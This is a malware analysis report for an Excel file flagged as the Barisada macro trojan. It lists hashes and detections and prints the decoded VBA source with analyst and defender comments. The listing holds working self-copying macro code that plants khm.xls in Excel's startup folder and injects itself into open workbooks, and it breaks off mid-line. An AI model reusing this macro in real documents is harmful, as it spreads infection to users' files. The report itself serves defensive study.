Barisada — Office (OLE) malware analysis

Static analysis result for SHA-256 2733c88ee12ef56e…

MALICIOUS

Office (OLE)

30.0 KB Created: 2001-07-02 13:02:33 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 1586ef2adcbb6b8c97ab4c0a898b2bf6 SHA-1: a36b972b11547887adf098e83c8830e248dc7f1e SHA-256: 2733c88ee12ef56ee6336705e85cd05fde63bc1a188b65469266ab9bb0cba873
140 Risk Score

Malware Insights

Barisada · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

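The file is detected as the Barisada trojan family by ClamAV. The VBA macro attempts to establish persistence by creating a workbook named 'khm.xls' in the application's startup path (Application.StartupPath, Excel's own startup folder) and injecting its code into it; the same loop also copies the code into every empty VBA component of each open workbook. Because Excel opens the workbooks in its startup path at launch, this suggests the malware aims to survive reboots and maintain its presence on the system.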

Heuristics 2

  • ClamAV: Xls.Trojan.Barisada-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Barisada-8
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7074 bytes
SHA-256: e3740fafed391648d898e35d9ffe0bd84ad3410d073a3d194daa1c6ac2c85912
Detection
ClamAV: Xls.Trojan.Barisada-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




' Workbook SheetCalculate event handler left empty: no statements run on this event.
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

' Workbook SheetDeactivate event handler left empty: no statements run on this event.
Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

' Workbook WindowActivate event handler left empty: no statements run on this event.
Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

' Workbook_WindowDeactivate: the only procedure in this module with a body; it
' holds the sample's persistence and replication logic.
' In the ThisWorkbook module Excel raises this event when a workbook window is
' deactivated, so the body runs during ordinary window switching.
' Visible behaviour, in order:
'   1. Saves a new workbook as khm.xls in Application.StartupPath (Excel's own
'      startup folder, whose workbooks Excel opens at launch).
'   2. For each open workbook, reads the ThisWorkbook code into vcode and writes
'      it into every VBA component that has zero code lines.
'   3. Closes khm.xls with its changes saved.
' Defender notes:
'   - Indicator: a workbook named khm.xls in Excel's startup folder.
'   - Step 2 needs programmatic access to VBProject; on Office versions that
'     have the "Trust access to the VBA project object model" setting, leaving
'     it disabled is expected to block that step - confirm per version.
'   - NOTE(review): persistence goes through Excel's startup folder rather than
'     a registry Run key; ATT&CK T1137 (Office Application Startup) may describe
'     it more closely - confirm against the mapping in use.
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

' flag is assigned here and not read anywhere in this procedure.
flag = False
 
' (Original comment is Korean, mis-decoded on this page; translated:)
' If "khm.xls" does not exist in the xlstart folder (StartupPath), create it.
' The Dir() result is stored in `myile`, while the tests below read `myfile`,
' which no visible line assigns. No Option Explicit appears in this listing, so
' the tests presumably always see an empty value and the branch runs on every
' event - confirm.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   ' Screen updating is switched off here and not switched back on in this procedure.
   Application.ScreenUpdating = False
   ' addtomru:=False keeps the new file out of Excel's recently-used file list.
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
' (Translated:) If the ThisWorkbook component has code, store the code in the vcode variable.
' `o` below is the letter o, not the digit zero; no visible line assigns it, so
' it presumably compares as empty/zero - confirm.
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
' (Translated:) Find the components that have no code and insert the value of the vcode variable.
' Only components whose CountOfLines is 0 are written to; components that
' already hold code are left as they are.
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 ' Saves and closes khm.xls, using the same `myfile` test as above.
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




' Empty procedure: the body holds no statements.
' NOTE(review): this copy sits in a module whose VB_Name is "Sheet1"; in a
' worksheet module a Workbook_-prefixed name is presumably not bound to any
' workbook event - confirm.
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

' Empty procedure: the body holds no statements.
' NOTE(review): this copy sits in a module whose VB_Name is "Sheet1"; in a
' worksheet module a Workbook_-prefixed name is presumably not bound to any
' workbook event - confirm.
Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

' Empty procedure: the body holds no statements.
' NOTE(review): this copy sits in a module whose VB_Name is "Sheet1"; in a
' worksheet module a Workbook_-prefixed name is presumably not bound to any
' workbook event - confirm.
Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

' Workbook_WindowDeactivate, as found in the module whose VB_Name is "Sheet1".
' The body matches, line for line, the one listed under the "ThisWorkbook"
' module; the inner loop below writes ThisWorkbook's code into components with
' zero lines, which would account for this copy.
' NOTE(review): in a worksheet module a Workbook_-prefixed name is presumably
' not bound to any workbook event, so this copy may never be triggered - confirm.
' Visible behaviour, in order:
'   1. Saves a new workbook as khm.xls in Application.StartupPath (Excel's own
'      startup folder, whose workbooks Excel opens at launch).
'   2. For each open workbook, reads the ThisWorkbook code into vcode and writes
'      it into every VBA component that has zero code lines.
'   3. Closes khm.xls with its changes saved.
' Defender notes:
'   - Indicator: a workbook named khm.xls in Excel's startup folder.
'   - Step 2 needs programmatic access to VBProject; on Office versions that
'     have the "Trust access to the VBA project object model" setting, leaving
'     it disabled is expected to block that step - confirm per version.
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

' flag is assigned here and not read anywhere in this procedure.
flag = False
 
' (Original comment is Korean, mis-decoded on this page; translated:)
' If "khm.xls" does not exist in the xlstart folder (StartupPath), create it.
' The Dir() result is stored in `myile`, while the tests below read `myfile`,
' which no visible line assigns. No Option Explicit appears in this listing, so
' the tests presumably always see an empty value and the branch runs on every
' call - confirm.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   ' Screen updating is switched off here and not switched back on in this procedure.
   Application.ScreenUpdating = False
   ' addtomru:=False keeps the new file out of Excel's recently-used file list.
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\khm.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 
' (Translated:) If the ThisWorkbook component has code, store the code in the vcode variable.
' `o` below is the letter o, not the digit zero; no visible line assigns it, so
' it presumably compares as empty/zero - confirm.
For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> o Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
' (Translated:) Find the components that have no code and insert the value of the vcode variable.
' Only components whose CountOfLines is 0 are written to; components that
' already hold code are left as they are.
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 ' Saves and closes khm.xls, using the same `myfile` test as above.
 If myfile <> "khm.xls" Then Workbooks("khm.xls").Close savechanges:=True
 
End Sub























































Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




' Empty procedure: the body holds no statements.
' NOTE(review): this copy sits in a module whose VB_Name is "Sheet2"; in a
' worksheet module a Workbook_-prefixed name is presumably not bound to any
' workbook event - confirm.
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

' Empty procedure: the body holds no statements.
' NOTE(review): this copy sits in a module whose VB_Name is "Sheet2"; in a
' worksheet module a Workbook_-prefixed name is presumably not bound to any
' workbook event - confirm.
Private Sub Workbook_SheetDeactivate(ByVal Sh As Object)

End Sub

' Empty procedure: the body holds no statements.
' NOTE(review): this copy sits in a module whose VB_Name is "Sheet2"; in a
' worksheet module a Workbook_-prefixed name is presumably not bound to any
' workbook event - confirm.
Private Sub Workbook_WindowActivate(ByVal Wn As Window)

End Sub

Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

flag = False
 
'xlstartÆú´õ(StartupPath)¿¡ "khm.xls"°¡ ¾øÀ¸¸é »õ·Î ¸¸µç´Ù.
 myile = Dir(Application.StartupPath & "\khm.xls")
 If myfile <> "khm.xls" Then
   Application.Sc
... (truncated)